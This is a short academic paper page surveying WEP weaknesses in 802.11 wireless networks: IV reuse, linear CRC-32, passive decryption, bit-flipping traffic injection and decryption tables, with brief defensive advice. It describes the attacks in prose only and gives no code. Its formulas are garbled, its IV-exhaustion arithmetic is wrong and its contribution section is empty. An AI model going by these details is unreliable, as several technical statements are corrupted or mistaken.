ArticlePDF Available

Hacking And Defending In Wireless Networks

Authors:

Abstract and Figures

This paper is an up to date look at various problems inherent in today’s wireless networks from a user as well as administrator’s point of view. The wireless medium makes eaves dropping a major threat, interference a problem, and the interception of transmissions easier than on wired networks. Several security problems and threats are exposed in detail along with descriptions on how to exploit them. The paper concludes with a look at guidelines to ensuring the security of these networks and preventing the attacks described in this paper.
Content may be subject to copyright.
Vol 2 | Issue 3 | Spring Edition | DOI : February 2014 | Pp 353-356 | ISSN 2279 0381
Hacking And Defending In Wireless Networks
A.S.Syed Navaz *a, K.Girija b
a Asst.professor, Department of Computer Applications, Muthayammal College of Arts & Science, Namakkal, Tamilnadu, India
b Student / Department of Computer Applications, Muthayammal College of Arts & Science, Namakkal, Tamilnadu, India
* email Id: a.s.syednawaz@gmail.com
353 www.indiasciencetech.com
Keywords: Wireless, LAN, Attacks,
Security, WLAN.
Abstract: This paper is an up to date
look at various problems inherent in today’s
wireless networks from a user as well as
administrator’s point of view. The wireless
medium makes eaves dropping a major threat,
interference a problem, and the interception of
transmissions easier than on wired networks.
Several security problems and threats are exposed
in detail along with descriptions on how to exploit
them. The paper concludes with a look at
guidelines to ensuring the security of these
networks and preventing the attacks described in
this paper.
Introduction
In today’s fast changing world
management of information is the key to corporate
success. This goes hand-in-hand with
communication infrastructure. Of late there have
been a tremendous growth in wireless LAN usage,
a growth that is compared by many to be almost
as the phenomenal as that of the Internet in the
90s.
Access to a wired LAN is governed by
access to an Ethernet port for that LAN.
Therefore, access control for a wired LAN often is
viewed in terms of physical access to LAN ports.
Similarly, because data transmitted on a wired
LAN is directed to a particular destination,
privacy cannot be compromised unless someone
uses specialized equipment to intercept
transmissions on their way to their destination. In
short, a security breach on a wired LAN is
possible only if the LAN is physically
compromised. With a wireless LAN (WLAN),
transmitted data is broadcast over the air using
radio waves. Thus it can be received by any
WLAN client in the area served by the data
transmitter. Because radio waves travel through
ceilings, floors, and walls, transmitted data may
reach unintended recipients on different floors
and even outside the building of the transmitter.
Installing a WLAN may seem like putting
Ethernet ports everywhere including your parking
lot! Similarly, data privacy is a genuine concern
with wireless LANs because there is no way to
direct a WLAN transmission to only one recipient.
Wireless Encryption WEP Setup:
The 802.11 standard describes the
communication that occurs in wireless local area
network (LANs). The wired equivalent policy
(WEP) algorithm is used to protect unauthorized
access to wireless network, this function is not an
explicit goal in the 802.11 standard, but it is
frequently considered to be a feature of WEP.
WEP relies on a secret key that is being
shared between mobile stations (eg. A laptop with
a wireless Ethernet card) and an access point (is,
a base station). The secret used to encrypt packets
before they are transmitted, and an integrity
check is used to ensure that packets are not
modified to transit. The standard doesn’t discuss
how the share is being established. In practice,
most installations use a single key that is shared
between all mobile stations and access points.
More sophisticated key management techniques
can be helpful to defend from the attacks we
describe; however no commercial system are
aware of has mechanisms to support such
techniques.
Fig. 1 Encrypted WEP frame
Basic Encryption Mechanism
Journal of NanoScience and NanoTechnology | Vol 2 | Issue 3 | Spring Edition | ISSN 2279 0381
www.indiasciencetech.com 354
The RC4 algorithm generates a key
stream (a long sequence of pseudorandom bytes)
as a function of the IV and the secret key k. This
key stream is denoted by RC4 (v, k). Then we
exclusive-or (XOR) the plaintext with the key
stream to obtain the cipher text C from plaintext
P:
C = P RC4 (v, k)
Decryption:
It is a simple reverse operation at the
recipient’s end.
P’ = C RC4 (v, k)
= (P RC4 (v, k)) RC4 (v, k)
=p
Fig. 2 Gap Between Wep and Others
The following two sections describe the
problem in the algorithm and the technical details
of the attacks.
Problems
WEP uses the RC4 encryption algorithm
which is known as stream cipher. A stream cipher
operates by expanding a short key into an infinite
pseudo random key stream. XOR-ing the key
stream with the cipher text yields the original
plain text.
Fig. 3 RC4 Stream Cipher
This mode of operation makes stream
ciphers vulnerable to several attacks. Of an
attacker flips a bit in a cipher text, then upon
decryption, the corresponding bit in the plain text
will be flipped. The statistical attacks become
increasingly more practical as more cipher texts
that use the same key stream are known. Once
one of the plain texts becomes known, it is trivial
to recover all of the others.
WEP has defenses against both of these
attacks. To ensure that a packet has not been
modified in transmit; it uses an Integrity check
(IC) field in the packet.
The IV is also included in the packet.
However both of these measures are implemented
incorrectly, resulting in poor security. The
integrity check field is being implemented as
CRC-32 checksum, which is a part of the
encrypted payload of the packet. However, CRC-
32 is linear, which means it is possible to compute
the bit difference to two CRC’s based on the bit
difference of the messages over which they are
taken. In other words, flipping buts carries
through after an RC4 decryption, this allows the
hacker to flip arbitrary bits in an encrypted
message and correctly adjust the checksum so
that the resulting message appears valid.
The initialization vector in WEP is a 24-
bit field, which is sent in the clear text part of the
message. Such a small space of initialization
vectors guaranteed the reuse of the same key
stream. A busy access point which constantly send
1500 byte packets at 11 Mbps,will exhaust the
space of IVs after 1500*(11*10^6)*2^24=~18000
sec, or 5 hours. (The amount of time may be even
smaller, since many packets are smaller than
1500 bytes). This allows an attacker to collect two
cipher text that are encrypted with the same key
is used by all mobile stations, there are even more
chances of IV collision.
For example, a common wireless card form
lucent resets the IV to 0 each time ea card is
initialized, and increments the IV by 1 with each
packet. This means that two cards inserted at
roughly the same time will provide an abundance
of IV collisions for an attacker.( Worse still, the
802.11 standard specifies that changing the Iv
with each packet is optional.
Attacks Passive Attack to decrypt Traffic.
The first attack follows directly from the
above observation. A passive eavesdropper can
intercept all wireless traffic, until an IV collision
occurs. By XOR-ing two packets that use the same
IV, the attacker obtains the XOR of the two plain
text messages. The resulting XOR can be used to
infer data about the contents of messages. Further
Journal of NanoScience and NanoTechnology | Vol 2 | Issue 3 | Spring Edition | ISSN 2279 0381
355 www.indiasciencetech.com
educated guesses about the contents of one or both
of the messages can be used to statistically reduce
the space of possible messages, and in some case it
is possible to determine the exact contents.
With only a small factor in the amount of
time necessary, it is possible to recover a modest
number of messages encrypted with the same key
stream, and the success rate of statistical analysis
grows quickly. Once it is possible to recover the
entire plain text for one of the messages with the
same IV follows directly, since all the pair wise
XOR’s are known.
An extension to this attack uses a host
somewhere on the interned to send traffic from
the outside to a host on the wireless network
installation.
Fig. 4 Idea of Key recovery Attack
Active Attack to inject traffic
The following attack is also a direct
consequence of the problems described in the
previous section. The procedure involves
constructing a new -message, calculating the
CRC-32, and performing but flips on the original
encrypted message to change the plain text to the
new message. The basic property is that RC4(X) x
or x XOR Y= RC4(Y). This packet can now be sent
to the access point or mobile station, and it will be
accepted as a valid packet.
A slight modification to this attack makes
it much more insidious. Even without complete
knowledge of the packet, it is possible to flip
selected bits in a message and successfully adjust
the encrypted CRC (as described in the previous
section), to obtain a correct encrypted version of a
modified packet. For example, it is possible to
alter commands that are sending to the shell over
a telnet session or interactions with a file server.
Active Attack from Both Ends
The previous attack can be extended to
decrypt arbitrary traffic. In this case, the attacker
makes a guess about not the contents, but rather
the headers of a packet. This information is
usually quite easy to obtain or guess in particular,
all that is necessary to guess is the destination IP
address. Most wireless installations have internet
connectivity; the packet will be successfully
decrypted but he access point and forwarded
unencrypted through appropriate gateways and
routers to the attacker’s machine, revealing the
plaintext. If a guess can be made about the TCP
headers of the packet, it may even be possible to
change the destination port on the packet to be
port 80, which will allow it to be forwarded
through most firewalls.
Table based attacks
The small space of possible Initialization
Vectors allows an attacker to build a decryption
table. Once he learns the plain text for some
packet, he can compute the RC4 packets that use
the same IV. Over time, perhaps using the
techniques above, the attacker can build up a
table of IVs and corresponding key streams. This
table requires a fairly small amount of storage
(~15GB). Once it is built, the attacker can decrypt
every packet that is sent over the wireless link.
Implementation
Fig. 5 Our Contributions
Conclusion
It is quite simple, Wired Equivalent
privacy (WEP) use it but don’t rely on it yes it can
be cracked but it is not something which could be
done within few minutes. Wireless networks using
the 802.11b protocol are at present inherently
Journal of NanoScience and NanoTechnology | Vol 2 | Issue 3 | Spring Edition | ISSN 2279 0381
www.indiasciencetech.com 356
insecure and vulnerable to a variety of attacks.
Using a laptop with a Wi-Fi card and the right
software, an attacker is capable of immense
mischief and in theory could be as far as 20 miles
away in a safe haven. And this implementation is
simple as it does is limit the weak IV’s and could
slow down a hacker and could provide better
security for the wireless networks.
References
[1] Book: Hack attacks revealed- john chrillo
Applied Cryptography-
[2] www.sourgeforge.net
ResearchGate has not been able to resolve any citations for this publication.
ResearchGate has not been able to resolve any references for this publication.